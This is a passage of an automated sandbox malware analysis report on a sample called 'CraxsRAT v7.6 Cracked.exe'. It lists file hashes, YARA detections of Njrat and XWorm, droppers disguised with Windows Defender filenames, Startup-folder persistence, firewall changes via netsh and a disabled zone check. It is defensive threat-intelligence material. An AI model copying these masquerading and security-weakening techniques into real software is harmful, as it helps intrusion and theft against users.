Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Queries volume information: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables zone checking for all users

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe

Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS

Jump to behavior

Modifies the windows firewall

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe

Uses netsh to modify the Windows network and firewall settings

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Njrat

Source: Yara match	File source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.Windows Defender Notification.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.2480522494.0000000000412000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe, type: DROPPED

Remote Access Functionality

Yara detected Njrat

Source: Yara match	File source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.Windows Defender Notification.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.2480522494.0000000000412000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe, type: DROPPED

Windows Analysis Report
CraxsRAT v7.6 Cracked.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

ID:	1549855
Product:	CloudBasic
Start time:	07:30:14
Start date:	06.11.2024
Sample:	CraxsRAT v7.6 Cracked.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	8310bdf3ac82001830f75c15fba8cc15
SHA1:	581d729268cbd245d091633cc19692c4b5bfa0af
SHA256:	f7f52f6bbffa02fffcea30d5806050b7702a9a78dcbeae83e28c45d81aa1c4c4
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_CraxsRat.exe_f37025f379d72059c96545738d919e619031a9_bd7d1bf4_3b75dbd8-f3da-456c-92ab-32cb98bcbba9\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	25324FEB250B448C2FC89BC3AB6F3F77	43CA4A8E99AA353F55F995B5AA2AB21CB2180172	32E8B52E12C7F7B627AD35856ECD6EDE7E4E9052923C01CBD83B69054491D394
C:\ProgramData\Microsoft\Windows\WER\Temp\WERDBE6.tmp.dmp	Mini DuMP crash report, 16 streams, Wed Nov 6 06:31:51 2024, 0x1205a4 type	E6A0D4476ABBE7CB612D22B0D9B5A45B	936B4D4B783B54B4B68444545D84DB41F5B0F229	03B763DCDDA32BE51400BB245B507961DD151D1AAA53D185AEB832A433D08FD8
C:\ProgramData\Microsoft\Windows\WER\Temp\WERDCE1.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	44F011CEBF3BDBB0CD36AA3299294EF7	C10EE3290E54A13A2FAA5DB9A78864301E0478CF	E17B097F2C24C8B486691C0DCB57634EC0C168A8D3628AE2B94C5062CA221B6F
C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD11.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	7A487C884D3F06ABCD022EE9A85CA8B4	4AFCB30CF1615AA363DA8CEB308A9162B637A3A2	CC1624A994450D8B55A683CCA1E698FC93869754738A8975F55E82BF59840DC7
C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\CraxsRAT v7.6 Cracked.exe.log	ASCII text, with CRLF line terminators	CE035BEAB60D4AFA3046D011B59D6CBF	73F4EF1879EDEC734FE590B89A58F6EC26E7556E	35DC84A2C2432FA0004AD6B2ED401804769C35053C0DDE6CC70F8D224F90EA72
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Windows Defender Notification.exe.log	CSV text	30E4BDFC34907D0E4D11152CAEBE27FA	825402D6B151041BA01C5117387228EC9B7168BF	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Temp\CraxsRat.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	1D3AEE87B91F204A7D0C518F193A1E65	4744B3FEC521F538410991C7A5AA2833518A3419	4E061BDB6EC8A9454F3FD99C6D4FC0552690EF3EE8ADD76EBBE8A9C7250D89C3
C:\Users\user\AppData\Local\Temp\Log.tmp	ASCII text, with CRLF line terminators	2C11513C4FAB02AEDEE23EC05A2EB3CC	59177C177B2546FBD8EC7688BAD19D08D32640DE	BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	8D6E86E6E799C75BD5123534BDBF411B	9FC526E97077ED2A5E78371FDAB5AB7ECF789368	7892C9F14967696E15B99B3EAC66D65643357C9A4315F5E8210C8437C6617888
C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	FC15FB0CEC248EA16A6EDA92AB97B1F8	01AF6A8E81A92487ED29B9706EF8C86957666A45	73E71DC70F6DAEEBD9A257D0B0C6E67E87C6D50B27EB94AF08D15F1AFB6ED02C
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zovxly1.x0b.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2weuu5re.5jx.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4q35em12.mif.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anyknk1m.0uf.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b3t1sw2b.jkr.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fhqpwo2r.yoh.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gm4jzmdz.acl.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h53dt4lu.m53.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hnjfqkpi.v4i.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
